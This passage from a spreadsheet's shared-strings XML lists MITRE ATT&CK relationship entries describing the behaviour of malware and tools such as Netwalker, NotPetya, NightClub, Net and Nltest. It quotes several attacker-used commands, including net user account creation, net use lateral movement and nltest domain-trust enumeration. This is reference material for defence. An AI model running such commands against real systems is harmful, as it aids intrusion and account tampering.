    <t>[Neoichor](https://attack.mitre.org/software/S0691) can collect the user name from a victim's machine.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--80a8ee57-3169-4928-aa94-56d356b72931</t>
  </si>
  <si>
    <t>[Neoichor](https://attack.mitre.org/software/S0691) can use HTTP for C2 communications.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--e4485663-a636-4253-88a7-97999a909932</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) drops a signed Microsoft DLL to disk.(Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>relationship--4e1d7798-ffb7-4495-aab7-ca13db2dade5</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) creates a backdoor through which remote attackers can download files onto a compromised host.(Citation: Symantec Ristol May 2012)</t>
  </si>
  <si>
    <t>relationship--107e2686-a764-4ace-9200-43ead29ce579</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) creates a Registry subkey that registers a new service.(Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>relationship--f7ded6a1-043e-437a-8a0c-00ded73e5289</t>
  </si>
  <si>
    <t>relationship--6aadee2b-d475-4604-bb08-7df5e59eae3a</t>
  </si>
  <si>
    <t>[Net](https://attack.mitre.org/software/S0039) commands used with the &lt;code&gt;/domain&lt;/code&gt; flag can be used to gather information about and manipulate user accounts on the current domain.(Citation: Microsoft Net)</t>
  </si>
  <si>
    <t>relationship--14612b22-b271-4e93-8f66-d86ce8e10c29</t>
  </si>
  <si>
    <t>The &lt;code&gt;net user username \password \domain&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to create a domain account.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--c6e308b7-18ac-43c6-bba7-dea71d8f9d67</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net group /domain&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate groups.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--0eb8fe0a-6a6b-4d66-b6ff-e1d7f8f18948</t>
  </si>
  <si>
    <t>Commands under &lt;code&gt;net user&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate user accounts.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--15f74597-d92d-406f-9941-c0dfef3cb609</t>
  </si>
  <si>
    <t>The &lt;code&gt;net user username \password&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to create a local account.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--7185fe1c-1565-4175-bc7e-539ff704f4cb</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net group&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate groups.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--75f7d0e0-b1e9-4289-8895-d8a262930523</t>
  </si>
  <si>
    <t>The &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to remove an established connection to a network share.(Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>relationship--4e167937-d152-4c57-a7b7-e3b407470720</t>
  </si>
  <si>
    <t>The &lt;code&gt;net view \\remotesystem&lt;/code&gt; and &lt;code&gt;net share&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to find shared drives and directories on remote and local systems respectively.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--3b5d1788-c59b-4e84-97b0-b109df608619</t>
  </si>
  <si>
    <t>The &lt;code&gt;net accounts&lt;/code&gt; and &lt;code&gt;net accounts /domain&lt;/code&gt; commands with [Net](https://attack.mitre.org/software/S0039) can be used to obtain password policy information.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--0224ebf5-13ef-4fb0-b9e7-53ea58c15a4d</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net view&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about available remote systems.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--31ec568c-53c7-4dfb-8bfb-bfb7addca7ee</t>
  </si>
  <si>
    <t>Lateral movement can be done with [Net](https://attack.mitre.org/software/S0039) through &lt;code&gt;net use&lt;/code&gt; commands to connect to the on remote systems.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--a2423ac3-94b4-4936-962b-06562115cb70</t>
  </si>
  <si>
    <t>The &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;net stop&lt;/code&gt; commands can be used in [Net](https://attack.mitre.org/software/S0039) to execute or stop Windows services.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--5fc0ca38-bb65-43ab-b8b2-6861442b25a8</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net use&lt;/code&gt; and &lt;code&gt;net session&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about network connections from a particular host.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--4c94f67d-6662-44ea-be75-ded8b2dbfa00</t>
  </si>
  <si>
    <t>The &lt;code&gt;net start&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to find information about Windows services.(Citation: Savill 1999)</t>
  </si>
  <si>
    <t>relationship--1d36c3e8-238f-46c6-9b20-9fb4cb5c75ba</t>
  </si>
  <si>
    <t>The &lt;code&gt;net time&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to determine the local or remote system time.(Citation: TechNet Net Time)</t>
  </si>
  <si>
    <t>relationship--12455fe5-42dd-420e-839e-8a96886488f7</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) and [Windows Credential Editor](https://attack.mitre.org/software/S0005) to extract cached credentials from Windows systems.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--a8e6ca7b-5d75-429a-b8f8-de97d5c277b3</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--2355c588-ff82-4eaf-82db-54af59ede582</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--e89d06bc-31f3-49c0-a555-360eeff7f7c6</t>
  </si>
  <si>
    <t>[Net Crawler](https://attack.mitre.org/software/S0056) uses [PsExec](https://attack.mitre.org/software/S0029) to perform remote service manipulation to execute a copy of itself as part of lateral movement.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--9453d60b-4f3f-494f-985d-e29094ef8945</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) reports window names along with keylogger information to provide application context.(Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>relationship--10c6cc56-a028-4c2a-b24e-38d97fb4ebb7</t>
  </si>
  <si>
    <t>[NetTraveler](https://attack.mitre.org/software/S0033) contains a keylogger.(Citation: Kaspersky NetTraveler)</t>
  </si>
  <si>
    <t>relationship--2be17426-9704-4913-981b-6d8fe4471147</t>
  </si>
  <si>
    <t>S0457</t>
  </si>
  <si>
    <t>Netwalker</t>
  </si>
  <si>
    <t>malware--754effde-613c-4244-a83e-fb659b2a4d06</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</si>
  <si>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</si>
  <si>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relationship--678102a1-38ac-4d10-a0cc-a1c0cb47c78a</t>
  </si>
  <si>
    <t xml:space="preserve">[Netwalker](https://attack.mitre.org/software/S0457) can encrypt files on infected machines to extort victims.(Citation: TrendMicro Netwalker May 2020)	</t>
  </si>
  <si>
    <t>relationship--b9a67332-54a8-4531-948f-51e3ae2a0399</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the [Netwalker](https://attack.mitre.org/software/S0457) DLL being loaded into memory.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--3967e156-2135-4416-b3c3-79372d19d610</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--19c0c01d-5f43-4a4d-8385-0862f6b1bf78</t>
  </si>
  <si>
    <t xml:space="preserve">The [Netwalker](https://attack.mitre.org/software/S0457) DLL has been injected reflectively into the memory of a legitimate running process.(Citation: TrendMicro Netwalker May 2020)	</t>
  </si>
  <si>
    <t>relationship--f1091b2c-ea09-402b-9717-8b7526fb5c13</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457)'s DLL has been embedded within the PowerShell script in hex format.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--87282f36-42f5-4eb1-9fec-778bc0f846b7</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec and certutil to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--ed0e96e6-6b71-468a-9e76-477ed3765ca4</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can delete the infected system's Shadow Volumes to prevent recovery.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--87343ae5-53c9-426c-abab-602c8041dafe</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec to copy the [Netwalker](https://attack.mitre.org/software/S0457) payload across accessible systems.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--2dd1c028-bebc-4631-b17b-3dd27a595c00</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can add the following registry entry: &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\{8 random characters}&lt;/code&gt;.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--0775a1ba-c95a-472e-ab1c-d21108acc907</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can use Windows API functions to inject the ransomware DLL.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--aa045472-7c41-49c5-af44-4df9cf1fa073</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) has been written in PowerShell and executed directly in memory, avoiding detection.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--998ad8ac-9929-4360-92c8-63efb1a81d78</t>
  </si>
  <si>
    <t xml:space="preserve">[Netwalker](https://attack.mitre.org/software/S0457) can detect and terminate active security software-related processes on infected systems.(Citation: TrendMicro Netwalker May 2020)	</t>
  </si>
  <si>
    <t>relationship--67e2417b-793a-4082-94ca-445718e925b1</t>
  </si>
  <si>
    <t>relationship--dda9f6bb-eb66-422b-aa58-fede809b6a6a</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can terminate system processes and services, some of which relate to backup software.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--e6a3f7bf-33c3-4d4c-bb27-46bd2842c750</t>
  </si>
  <si>
    <t>[Netwalker](https://attack.mitre.org/software/S0457) can determine the system architecture it is running on to choose which version of the DLL to use.(Citation: TrendMicro Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--1c3bc7ec-cabe-4c8f-9d6e-99afd877e845</t>
  </si>
  <si>
    <t>Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used batch scripts to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)</t>
  </si>
  <si>
    <t>relationship--5ff771c3-7d1c-4d04-a81e-76e374951e72</t>
  </si>
  <si>
    <t xml:space="preserve">[Netwalker](https://attack.mitre.org/software/S0457) can use WMI to delete Shadow Volumes.(Citation: TrendMicro Netwalker May 2020)	</t>
  </si>
  <si>
    <t>relationship--e50b989c-9ad6-44c6-8eb7-b44af742cc40</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can download and execute files.(Citation: Symantec Backdoor.Nidiran)</t>
  </si>
  <si>
    <t>relationship--438cae9c-cb03-4db9-ae59-24ed27147725</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can create a new service named msamger (Microsoft Security Accounts Manager), which mimics the legitimate Microsoft database by the same name.(Citation: Symantec Backdoor.Nidiran)(Citation: Microsoft SAM)</t>
  </si>
  <si>
    <t>relationship--9b1709f3-5062-42f1-82d9-191e66e1d14a</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) can create a new service named msamger (Microsoft Security Accounts Manager).(Citation: Symantec Backdoor.Nidiran)</t>
  </si>
  <si>
    <t>relationship--fa2c0697-0d47-4ee9-b5bf-845ac3453c3a</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can use `GetForegroundWindow` to enumerate the active window.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--911beb36-2a36-4c26-9e0d-bea35f6497b6</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can load a module to leverage the LAME encoder and `mciSendStringW` to control and capture audio.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--d12ef54e-bf2b-4c78-acb9-69a41287f6e0</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can use a DNS tunneling plugin to exfiltrate data by adding it to the subdomain portion of a DNS request.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--50c1c2f4-be50-49dc-bac6-dce8e80436ae</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can use a file monitor to steal specific files from targeted systems.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--29c989db-83f5-4c1a-944b-a0d78d652de2</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can use SMTP and DNS for file exfiltration and C2.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--1fec545d-436a-4b70-8ab8-87d217956b8f</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can use a file monitor to identify .lnk, .doc, .docx, .xls, .xslx, and .pdf files.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--3ad23432-af84-4887-bbf2-733d12d03395</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can load multiple additional plugins on an infected host.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--a881d020-95c1-4123-98d0-c31cb8d2ff4e</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can use a plugin for keylogging.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--9631e908-4538-4d61-943f-2b682e72b903</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) has copied captured files and keystrokes to the `%TEMP%` directory of compromised hosts.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--d8c447e8-6581-47ca-98d6-44b262023669</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can use emails for C2 communications.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--887ca054-848e-4a94-b299-2b625cb739df</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) has created a service named `WmdmPmSp` to spoof a Windows Media service.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--8e0dd075-33a5-464a-822e-f0878982ebf8</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) has chosen file names to appear legitimate including EsetUpdate-0117583943.exe for its dropper.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--2443296f-a8fc-431d-9865-d68dd6142b37</t>
  </si>
  <si>
    <t xml:space="preserve">[NightClub](https://attack.mitre.org/software/S1090) can modify the Registry to set the ServiceDLL for a service created by the malware for persistence.(Citation: MoustachedBouncer ESET August 2023)
</t>
  </si>
  <si>
    <t>relationship--dd0dbfef-065c-47c9-a9e3-ac8d02f7ca42</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can use multiple native APIs including `GetKeyState`, `GetForegroundWindow`, `GetWindowThreadProcessId`, and `GetKeyboardLayout`.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--2b3cf66b-29d9-4251-b170-977def2692ad</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) has used a non-standard encoding in DNS tunneling removing any `=` from the result of base64 encoding, and replacing `/` characters with `-s` and `+` characters with `-p`.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--5da3452c-3f93-42f0-98fd-54fa7bc0c562</t>
  </si>
  <si>
    <t xml:space="preserve">[NightClub](https://attack.mitre.org/software/S1090) can obfuscate strings using the congruential generator `(LCG): staten+1 = (690069 × staten + 1) mod 232`.(Citation: MoustachedBouncer ESET August 2023)
</t>
  </si>
  <si>
    <t>relationship--c1dddcf3-c3b1-498a-9a80-8dcbf6887d10</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) has the ability to monitor removable drives.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--c596d308-22af-45db-9c72-2ce1b3695f90</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) has the ability to use `GetWindowThreadProcessId` to identify the process behind a specified window.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--c434aa66-8fd2-47f0-8ec4-88a866d99e88</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can load a module to call `CreateCompatibleDC` and `GdipSaveImageToStream` for screen capture.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--9ae45b84-016d-4617-a4fd-3a309dc94b57</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) can modify the Creation, Access, and Write timestamps for malicious DLLs to match those of the genuine Windows DLL user32.dll.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--51eb8d9b-1ca4-4a9e-9df4-9415e54e8aff</t>
  </si>
  <si>
    <t>[NightClub](https://attack.mitre.org/software/S1090) has created a Windows service named `WmdmPmSp` to establish persistence.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--01b95067-ba65-48c2-8d2c-342e13007cc8</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate trusted domains by using commands such as &lt;code&gt;nltest /domain_trusts&lt;/code&gt;.(Citation: Nltest Manual)(Citation: Fortinet TrickBot)</t>
  </si>
  <si>
    <t>relationship--7f5933ff-6665-4bee-a291-0152c928747d</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate remote domain controllers using options such as &lt;code&gt;/dclist&lt;/code&gt; and &lt;code&gt;/dsgetdc&lt;/code&gt;.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>relationship--cb9f7bf4-a118-457c-95f8-512d84cf7be2</t>
  </si>
  <si>
    <t>[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate the parent domain of a local machine using &lt;code&gt;/parentdomain&lt;/code&gt;.(Citation: Nltest Manual)</t>
  </si>
  <si>
    <t>relationship--d969a8d8-189e-4315-81a4-c2244dfbd92c</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) uses &lt;code&gt;wevtutil&lt;/code&gt; to clear the Windows event logs.(Citation: Talos Nyetya June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--12c24e26-9415-45ef-b844-2bea03ee709e</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) encrypts user files and disk structures like the MBR with 2048-bit RSA.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--aac8f64e-54d1-4aad-80ee-dd3cd887f30e</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</si>
  <si>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</si>
  <si>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relationship--771b78fb-4ed1-4c55-b5e8-31775eb60ad2</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) searches for files ending with dozens of different file extensions prior to encryption.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--7c958b31-ef21-4231-9a8f-a66cb7db3355</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</si>
  <si>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</si>
  <si>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relationship--7cfb528c-6c2d-4f67-b59e-c343678db839</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use valid credentials with [PsExec](https://attack.mitre.org/software/S0029) or &lt;code&gt;wmic&lt;/code&gt; to spread itself to remote systems.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>relationship--e21a2fb4-1ba6-41dc-9278-72f6824382d8</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) drops [PsExec](https://attack.mitre.org/software/S0029) with the filename dllhost.dat.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>relationship--ab372993-3d63-4ca3-a064-e4b5820d8970</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) uses &lt;code&gt;rundll32.exe&lt;/code&gt; to install itself on remote systems when accessed via [PsExec](https://attack.mitre.org/software/S0029) or &lt;code&gt;wmic&lt;/code&gt;.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>relationship--cfde6757-e167-4792-a7ba-f40520f7d136</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</si>
  <si>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</si>
  <si>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relationship--44232d0d-5a86-4662-8934-054fcc9afbb3</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) creates a task to reboot the system one hour after infection.(Citation: Talos Nyetya June 2017)</t>
  </si>
  <si>
    <t>relationship--3258c355-677c-452d-b1fc-27767232437b</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) determines if specific antivirus programs are running on an infected host machine.(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--6157e239-92a8-427f-ba9b-2f06f5b03f12</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use [PsExec](https://attack.mitre.org/software/S0029) to help propagate itself across a network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>relationship--235a7fee-dfe1-4812-b553-e88bc9d56e89</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) will reboot the system one hour after infection.(Citation: Talos Nyetya June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--aa158d48-a9f5-49bb-8f15-166705f29b36</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) can use &lt;code&gt;wmic&lt;/code&gt; to help propagate itself across a network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>relationship--76eae7b3-2e02-41c6-8b31-b81c8d124006</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) collects credentials from several email clients.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--c002d944-83b6-4b64-a7a7-3129f31f9ae2</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) collects credentials from Internet Explorer, Mozilla Firefox, and Eudora.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--695c2f41-140a-48f9-9e14-0cd58d7712d1</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) can use SMTP for C2.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--6e2a0844-3618-41a7-b45d-12ad690f60a1</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) installs itself in &lt;code&gt;%ALLUSERPROFILE%\\Application Data\Microsoft\MediaPlayer\updatewindws.exe&lt;/code&gt;; the directory name is missing a space and the file name is missing the letter "o."(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--3a241a6c-11ee-4abc-a551-b5d4e594aad4</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) obfuscates internal strings and unpacks them at startup.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--8e82a523-fc73-4f3b-98dc-3b1e7199cd93</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) can use HTTP for C2.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--cc065036-1b46-4f5c-935e-fb80bd3de7c7</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) enumerates local and domain users(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--ab109b93-76a9-46da-8934-58751125fd1e</t>
  </si>
  <si>
    <t xml:space="preserve">[OSInfo](https://attack.mitre.org/software/S0165) specifically looks for Domain Admins and power users within the domain.(Citation: Symantec Buckeye) </t>
  </si>
  <si>
    <t>relationship--a1fab866-6486-4775-8caf-2b5744971477</t>
  </si>
  <si>
    <t>relationship--30c5a160-c42d-4bee-bcc6-b85f083136d7</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) has enumerated the local administrators group.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--bc85f8f4-5d65-484c-af82-6adbe42083d9</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers shares on the network(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--d07f2da6-6497-414f-96c1-9dd60155b169</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) queries the registry to look for information about Terminal Services.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--60198640-1e5a-4b8e-9a69-5f275f7e0e68</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) performs a connection test to discover remote systems in the network(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--8765dd7e-33cc-4040-927d-bf0aa16d3d79</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers information about the infected machine.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--7507eb37-407e-4428-b29f-da0bda3f7970</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) discovers the current domain information.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--d8a5e73d-fe56-42d7-a53d-09a90c21308b</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) enumerates the current network connections similar to &lt;code&gt; net use &lt;/code&gt;.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--8336111f-565e-4294-8b18-182c26da2421</t>
  </si>
  <si>
    <t>S0402</t>
  </si>
  <si>
    <t>OSX/Shlayer</t>
  </si>
  <si>
    <t>malware--f1314e75-ada8-49f4-b281-b1fb8b48f2a7</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can install malicious Safari browser extensions to serve ads.(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)</t>
  </si>
  <si>
    <t>relationship--5b5b5650-916b-4519-8cbd-da90589fe7b6</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</si>
  <si>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</si>
  <si>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relationship--8a2fbf8a-a05c-44d7-a270-afe092de9db5</t>
  </si>
  <si>
    <t>29 August 2019</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can escalate privileges to root by asking the user for credentials.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>relationship--c9d727db-88ac-4729-bf8a-98d99a83534d</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</si>
  <si>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</si>
  <si>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relationship--9cbfc2f6-0b87-402c-b536-2d9688b2e0ea</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</si>
  <si>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</si>
  <si>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relationship--60a6f8ce-1ee6-4770-8d83-9c2717d53fc3</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) has executed a .command script from a hidden directory in a mounted DMG.(Citation: Carbon Black Shlayer Feb 2019)</t>
  </si>
  <si>
    <t>relationship--3b967933-da99-40a4-9bd5-e8238e8d46c3</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</si>
  <si>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</si>
  <si>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relationship--08e05216-9133-4056-bbc9-b91ea0a7c6f5</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the `nohup` command to instruct executed payloads to ignore hangup signals.(Citation: Shlayer jamf gatekeeper bypass 2021)</t>
  </si>
  <si>
    <t>relationship--7a012427-6f85-45b5-b1b2-439c72f7efb4</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</si>
